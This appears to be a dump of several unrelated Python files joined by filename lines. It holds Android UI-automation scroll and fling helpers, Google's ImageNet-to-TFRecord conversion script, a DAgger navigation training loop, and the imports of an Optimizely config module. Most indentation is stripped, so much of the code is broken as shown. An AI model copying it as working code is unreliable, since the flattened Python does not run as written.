left, top, right, bottom = intersect(rect1, rect2)
return rect2["left"] - rect1["right"] if top < bottom else -1
return self.__view_beside(onrightof, **kwargs)
def left(self, **kwargs):
def onleftof(rect1, rect2):
left, top, right, bottom = intersect(rect1, rect2)
return rect1["left"] - rect2["right"] if top < bottom else -1
return self.__view_beside(onleftof, **kwargs)
def up(self, **kwargs):
def above(rect1, rect2):
left, top, right, bottom = intersect(rect1, rect2)
return rect1["top"] - rect2["bottom"] if left < right else -1
return self.__view_beside(above, **kwargs)
def down(self, **kwargs):
def under(rect1, rect2):
left, top, right, bottom = intersect(rect1, rect2)
return rect2["top"] - rect1["bottom"] if left < right else -1
return self.__view_beside(under, **kwargs)
def __view_beside(self, onsideof, **kwargs):
bounds = self.info["bounds"]
min_dist, found = -1, None
for ui in AutomatorDeviceObject(self.device, Selector(**kwargs)):
dist = onsideof(bounds, ui.info["bounds"])
if dist >= 0 and (min_dist < 0 or dist < min_dist):
min_dist, found = dist, ui
return found
@property
def fling(self):
'''
Perform fling action.
Usage:
d().fling() # default vertically, forward
d().fling.horiz.forward()
d().fling.vert.backward()
d().fling.toBeginning(max_swipes=100) # vertically
d().fling.horiz.toEnd()
'''
@param_to_property(
dimention=["vert", "vertically", "vertical", "horiz", "horizental", "horizentally"],
action=["forward", "backward", "toBeginning", "toEnd"]
)
def _fling(dimention="vert", action="forward", max_swipes=1000):
vertical = dimention in ["vert", "vertically", "vertical"]
if action == "forward":
return self.jsonrpc.flingForward(self.selector, vertical)
elif action == "backward":
return self.jsonrpc.flingBackward(self.selector, vertical)
elif action == "toBeginning":
return self.jsonrpc.flingToBeginning(self.selector, vertical, max_swipes)
elif action == "toEnd":
return self.jsonrpc.flingToEnd(self.selector, vertical, max_swipes)
return _fling
@property
def scroll(self):
'''
Perform scroll action.
Usage:
d().scroll(steps=50) # default vertically and forward
d().scroll.horiz.forward(steps=100)
d().scroll.vert.backward(steps=100)
d().scroll.horiz.toBeginning(steps=100, max_swipes=100)
d().scroll.vert.toEnd(steps=100)
d().scroll.horiz.to(text="Clock")
'''
def __scroll(vertical, forward, steps=100):
method = self.jsonrpc.scrollForward if forward else self.jsonrpc.scrollBackward
return method(self.selector, vertical, steps)
def __scroll_to_beginning(vertical, steps=100, max_swipes=1000):
return self.jsonrpc.scrollToBeginning(self.selector, vertical, max_swipes, steps)
def __scroll_to_end(vertical, steps=100, max_swipes=1000):
return self.jsonrpc.scrollToEnd(self.selector, vertical, max_swipes, steps)
def __scroll_to(vertical, **kwargs):
return self.jsonrpc.scrollTo(self.selector, Selector(**kwargs), vertical)
@param_to_property(
dimention=["vert", "vertically", "vertical", "horiz", "horizental", "horizentally"],
action=["forward", "backward", "toBeginning", "toEnd", "to"])
def _scroll(dimention="vert", action="forward", **kwargs):
vertical = dimention in ["vert", "vertically", "vertical"]
if action in ["forward", "backward"]:
return __scroll(vertical, action == "forward", **kwargs)
elif action == "toBeginning":
return __scroll_to_beginning(vertical, **kwargs)
elif action == "toEnd":
return __scroll_to_end(vertical, **kwargs)
elif action == "to":
return __scroll_to(vertical, **kwargs)
return _scroll
device = AutomatorDevice()
|
build_imagenet_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFRecord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take ~2.5 hours on an HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import google3
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels, one per line.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file contains the mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist multiple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
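def _parse_example_sketch(serialized):
  """Minimal sketch (not part of the original pipeline) of how a record
  written by _convert_to_example could be parsed back with the TF 1.x API.
  Only a few of the feature keys written above are shown here."""
  feature_map = {
      'image/encoded': tf.FixedLenFeature([], dtype=tf.string),
      'image/class/label': tf.FixedLenFeature([], dtype=tf.int64),
      'image/class/text': tf.FixedLenFeature([], dtype=tf.string),
      'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32),
  }
  return tf.parse_single_example(serialized, feature_map)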
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
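# A minimal usage sketch (the file name is a placeholder):
#
#   coder = ImageCoder()
#   data = tf.gfile.FastGFile('/path/to/image.png', 'r').read()
#   jpeg_data = coder.png_to_jpeg(data)
#   image = coder.decode_jpeg(jpeg_data)  # numpy array of shape (height, width, 3)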
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'r').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch index within [0, len(ranges)).
ranges: list of integer pairs specifying the range of images each batch
analyzes in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list may contain 0 or more bounding box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
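  # e.g. covering files [0, 640) with 64 shards gives
  # shard_ranges == [0, 10, 20, ..., 640], i.e. 10 files per shard.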
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list may contain 0 or more bounding box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches; batch i covers [ranges[i][0], ranges[i][1]).
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list may contain 0 or more bounding box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist multiple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
dagger_train.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import tensorflow as tf
import threading
import numpy as np
import signal
import random
import os
import time
from dagger_policy_generators import SmashNet
from dagger_training_thread import SmashNetTrainingThread
from scene_loader import THORDiscreteEnvironment as Environment
from utils.ops import log_uniform
from utils.rmsprop_applier import RMSPropApplier
from dagger_constants import (
    ACTION_SIZE, PARALLEL_SIZE, INITIAL_ALPHA_LOW, INITIAL_ALPHA_HIGH,
    INITIAL_ALPHA_LOG_RATE, INITIAL_DIFFIDENCE_RATE, MAX_TIME_STEP,
    CHECKPOINT_DIR, LOG_FILE, RMSP_EPSILON, RMSP_ALPHA, GRAD_NORM_CLIP,
    USE_GPU, NUM_CPU, TASK_TYPE, TRAIN_TASK_LIST, VALID_TASK_LIST,
    DYNAMIC_VALIDATE, ENCOURAGE_SYMMETRY)
if __name__ == '__main__':
device = "/gpu:0" if USE_GPU else "/cpu:0"
network_scope = TASK_TYPE
list_of_tasks = TRAIN_TASK_LIST
list_of_val_tasks = VALID_TASK_LIST
scene_scopes = list_of_tasks.keys()
global_t = 0
stop_requested = False
if not os.path.exists(CHECKPOINT_DIR): os.mkdir(CHECKPOINT_DIR)
initial_learning_rate = log_uniform(INITIAL_ALPHA_LOW,
INITIAL_ALPHA_HIGH,
INITIAL_ALPHA_LOG_RATE)
initial_diffidence_rate_seed = INITIAL_DIFFIDENCE_RATE # TODO: hyperparam
global_network = SmashNet(action_size = ACTION_SIZE,
device = device,
network_scope = network_scope,
scene_scopes = scene_scopes)
branches = []
branch_val = []
for scene in scene_scopes:
for task in list_of_tasks[scene]:
branches.append((scene, task)) # single scene, task pair for now
branch_val.append(False)
if DYNAMIC_VALIDATE:
for task in list_of_val_tasks[scene]:
branches.append((scene, task))
branch_val.append(True)
print("Total navigation tasks: %d" % len(branches))
NUM_TASKS = len(branches)
assert PARALLEL_SIZE >= NUM_TASKS, "Not enough threads for multitasking: at least {} threads needed.".format(NUM_TASKS)
learning_rate_input = tf.placeholder("float")
grad_applier = RMSPropApplier(learning_rate = learning_rate_input,
decay = RMSP_ALPHA,
momentum = 0.0,
epsilon = RMSP_EPSILON,
clip_norm = GRAD_NORM_CLIP,
device = device)
# instantiate each training thread
# each thread is training for one target in one scene
training_threads = [] # 1 training thread for the single target
for i in range(PARALLEL_SIZE):
scene, task = branches[i%NUM_TASKS]
if USE_GPU:
device = "/gpu:0"
else:
device = "/cpu:{:d}".format(i%NUM_CPU)
mode = "val" if branch_val[i % NUM_TASKS] else "train"
training_thread = SmashNetTrainingThread(i,
global_network,
initial_learning_rate,
learning_rate_input,
grad_applier,
MAX_TIME_STEP,
device,
initial_diffidence_rate_seed,
mode=mode,
network_scope = "thread-%d"%(i+1),
scene_scope = scene,
task_scope = task,
encourage_symmetry= ENCOURAGE_SYMMETRY)
training_threads.append(training_thread)
print("Total train threads: %d" % len(training_threads))
# prepare session
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True))
init = tf.global_variables_initializer()
sess.run(init)
# create tensorboard summaries
summary_op = dict()
summary_placeholders = dict()
for i in range(PARALLEL_SIZE):
scene, task = branches[i%NUM_TASKS]
key = scene + "-" + task
if branch_val[i % NUM_TASKS]:
key = scene + "-val-" + task
# summary for tensorboard
episode_length_input = tf.placeholder("float")
episode_pi_sim_input = tf.placeholder("float")
episode_loss_input = tf.placeholder("float")
scalar_summaries = [
tf.summary.scalar(key+"/Episode Length", episode_length_input),
tf.summary.scalar(key+"/Episode Pi Similarity", episode_pi_sim_input),
tf.summary.scalar(key+"/Episode Loss", episode_loss_input),
]
summary_op[key] = tf.summary.merge(scalar_summaries)
summary_placeholders[key] = {
"episode_length_input": episode_length_input,
"episode_pi_sim_input": episode_pi_sim_input,
"episode_loss_input": episode_loss_input,
}
summary_writer = tf.summary.FileWriter(LOG_FILE + '/' + time.strftime("%Y-%m-%d-%H%M%S"), sess.graph)
# init or load checkpoint with saver
# if you don't need to be able to resume training, use the next line instead.
# it will result in a much smaller checkpoint file.
# saver = tf.train.Saver(max_to_keep=10, var_list=global_network.get_vars())
saver = tf.train.Saver(max_to_keep=10)
checkpoint = tf.train.get_checkpoint_state(CHECKPOINT_DIR)
if checkpoint and checkpoint.model_checkpoint_path:
saver.restore(sess, checkpoint.model_checkpoint_path)
print("checkpoint loaded: {}".format(checkpoint.model_checkpoint_path))
tokens = checkpoint.model_checkpoint_path.split("-")
# set global step
global_t = int(tokens[1])
print(">>> global step set: {}".format(global_t))
else:
print("Could not find old checkpoint")
def train_function(parallel_index):
global global_t
training_thread = training_threads[parallel_index]
last_global_t = 0
scene, task = branches[parallel_index % NUM_TASKS]
key = scene + "-" + task
if branch_val[parallel_index % NUM_TASKS]:
key = scene + "-val-" + task
while global_t < MAX_TIME_STEP and not stop_requested:
diff_global_t = training_thread.process(sess, global_t, summary_writer,
summary_op[key], summary_placeholders[key])
global_t += diff_global_t
# periodically save checkpoints to disk
if parallel_index == 0 and global_t - last_global_t > 1000000:
print('Save checkpoint at timestamp %d' % global_t)
saver.save(sess, CHECKPOINT_DIR + '/' + 'checkpoint', global_step = global_t)
last_global_t = global_t
def signal_handler(sig, frame): # 'sig' avoids shadowing the signal module
global stop_requested
print('You pressed Ctrl+C!')
stop_requested = True
train_threads = [threading.Thread(target=train_function, args=(i,)) for i in range(PARALLEL_SIZE)]
signal.signal(signal.SIGINT, signal_handler)
# start each training thread
for t in train_threads: t.start()
print('Press Ctrl+C to stop.')
signal.pause()
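# Note: signal.pause() is POSIX-only; on Windows this wait would need another
# mechanism, e.g. looping over t.join(timeout) for the worker threads.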
# wait for all threads to finish
for t in train_threads: t.join()
print('Now saving data. Please wait.')
saver.save(sess, CHECKPOINT_DIR + '/' + 'checkpoint', global_step = global_t)
summary_writer.close()
|
config_manager.py
|
# Copyright 2019-2020, Optimizely
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import numbers
import requests
import threading
import time
from requests import codes as http_status_codes
from requests import exceptions as requests_exceptions
from . import exceptions as optimizely_exceptions
from . import logger as optimizely_logger
from . import project_config
from .error_handler import NoOpErrorHandler
